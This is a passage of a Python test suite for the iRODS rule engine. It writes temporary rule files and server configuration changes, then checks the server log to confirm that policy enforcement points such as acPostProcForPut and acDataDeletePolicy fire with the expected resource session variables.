lib.prepend_string_to_file('\nacPostProcForPut { replicateMultiple( \"r1,r2\" ); }\n', corefile)
time.sleep(2) # remove once file hash fix is commited #2279
# add new rule to end of core.re
newrule = """
# multiple replication rule
replicateMultiple(*destRgStr) {
*destRgList = split(*destRgStr, ',');
writeLine("serverLog", " acPostProcForPut multiple replicate $objPath $filePath -> *destRgStr");
foreach (*destRg in *destRgList) {
writeLine("serverLog", " acPostProcForPut replicate $objPath $filePath -> *destRg");
*e = errorcode(msiSysReplDataObj(*destRg,"null"));
if (*e != 0) {
if(*e == -808000) {
writeLine("serverLog", "$objPath cannot be found");
$status = 0;
succeed;
} else {
fail(*e);
}
}
}
}
"""
time.sleep(2) # remove once file hash fix is commited #2279
lib.prepend_string_to_file(newrule, corefile)
time.sleep(2) # remove once file hash fix is commited #2279
# put data
tfile = "rulebasetestfile"
lib.touch(tfile)
self.admin.assert_icommand(['iput', tfile])
# check replicas
self.admin.assert_icommand(['ils', '-L', tfile], 'STDOUT_MULTILINE', [' demoResc ', ' r1 ', ' r2 '])
# clean up and remove new resources
self.admin.assert_icommand("irm -rf " + tfile)
self.admin.assert_icommand("iadmin rmresc r1")
self.admin.assert_icommand("iadmin rmresc r2")
time.sleep(2) # remove once file hash fix is commited #2279
def test_dynamic_pep_with_rscomm_usage(self):
# save original core.re
corefile = os.path.join(lib.get_core_re_dir(), "core.re")
origcorefile = os.path.join(lib.get_core_re_dir(), "core.re.orig")
os.system("cp " + corefile + " " + origcorefile)
# add dynamic PEP with rscomm usage
time.sleep(1) # remove once file hash fix is commited #2279
os.system('''echo "pep_resource_open_pre(*OUT) { msiGetSystemTime( *junk, '' ); }" >> ''' + corefile)
time.sleep(1) # remove once file hash fix is commited #2279
# check rei functioning
self.admin.assert_icommand("iget " + self.testfile + " - ", 'STDOUT_SINGLELINE', self.testfile)
# restore core.re
time.sleep(1) # remove once file hash fix is commited #2279
os.system("cp " + origcorefile + " " + corefile)
time.sleep(1) # remove once file hash fix is commited #2279
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads re server log')
def test_rulebase_update__2585(self):
rule_file = 'my_rule.r'
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
my_rule = """
my_rule {
delay("<PLUSET>1s</PLUSET>") {
do_some_stuff();
}
}
INPUT null
OUTPUT ruleExecOut
"""
with open(rule_file, 'w') as f:
f.write(my_rule)
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
with lib.file_backed_up(server_config_filename):
# write new rule file to config dir
test_rule = 'do_some_stuff() { writeLine( "serverLog", "TEST_STRING_TO_FIND_1_2585" ); }'
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
lib.restart_irods_server()
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('re')
self.admin.assert_icommand('irule -F ' + rule_file)
time.sleep(35) # wait for test to fire
assert lib.count_occurrences_of_string_in_log('re', 'TEST_STRING_TO_FIND_1_2585', start_index=initial_log_size)
# repave rule with new string
test_rule = 'do_some_stuff() { writeLine( "serverLog", "TEST_STRING_TO_FIND_2_2585" ); }'
os.unlink(test_re)
with open(test_re, 'w') as f:
f.write(test_rule)
time.sleep(35) # wait for delay rule engine to wake
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('re')
self.admin.assert_icommand('irule -F ' + rule_file)
time.sleep(35) # wait for test to fire
assert lib.count_occurrences_of_string_in_log('re', 'TEST_STRING_TO_FIND_2_2585', start_index=initial_log_size)
# cleanup
os.unlink(test_re)
os.unlink(rule_file)
lib.restart_irods_server()
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForPut__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# iput test file to trigger PEP
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acDataDeletePolicy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# delete test file to trigger PEP
sesh.assert_icommand('irm -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForDelete__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# delete test file to trigger PEP
sesh.assert_icommand('irm -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acSetChkFilePathPerm__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# test file for ireg
testfile = os.path.join(lib.get_irods_top_level_dir(), 'VERSION.json')
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# ireg test file to trigger PEP
target_obj = os.path.join(sesh.home_collection, os.path.basename(testfile))
sesh.assert_icommand('ireg {testfile} {target_obj}'.format(**locals()), 'STDERR_SINGLELINE', 'PATH_REG_NOT_ALLOWED')
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForFilePathReg__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
# use admin to be allowed to register stuff
sesh = self.admin
# test file for ireg
username = sesh.username
resc_vault_path = lib.get_vault_path(sesh)
testfile = '{resc_vault_path}/home/{username}/foo.txt'.format(**locals())
open(testfile, 'a').close()
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# ireg test file to trigger PEP
target_obj = os.path.join(sesh.home_collection, os.path.basename(testfile))
sesh.assert_icommand('ireg {testfile} {target_obj}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForCopy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# copy test file to trigger PEP
sesh.assert_icommand('icp {testfile} {testfile}_copy'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
sesh.run_icommand('irm -f {testfile}_copy'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acSetVaultPathPolicy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# iput test file to trigger PEP
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPreprocForDataObjOpen__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
target_obj = os.path.join(sesh.session_collection, testfile)
# prepare rule file
rule_file = "test_rule_file.r"
rule_string = '''
test_acPostProcForCreate__3024 {{
msiDataObjOpen("{target_obj}",*FD);
msiDataObjClose(*FD,*Status);
}}
INPUT null
OUTPUT ruleExecOut
'''.format(**locals())
with open(rule_file, 'w') as f:
f.write(rule_string)
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# invoke irule to trigger PEP
sesh.assert_icommand('irule -F {rule_file}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(rule_file)
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForOpen__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
target_obj = os.path.join(sesh.session_collection, testfile)
# prepare rule file
rule_file = "test_rule_file.r"
rule_string = '''
test_acPostProcForCreate__3024 {{
msiDataObjOpen("{target_obj}",*FD);
msiDataObjClose(*FD,*Status);
}}
INPUT null
OUTPUT ruleExecOut
'''.format(**locals())
with open(rule_file, 'w') as f:
f.write(rule_string)
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
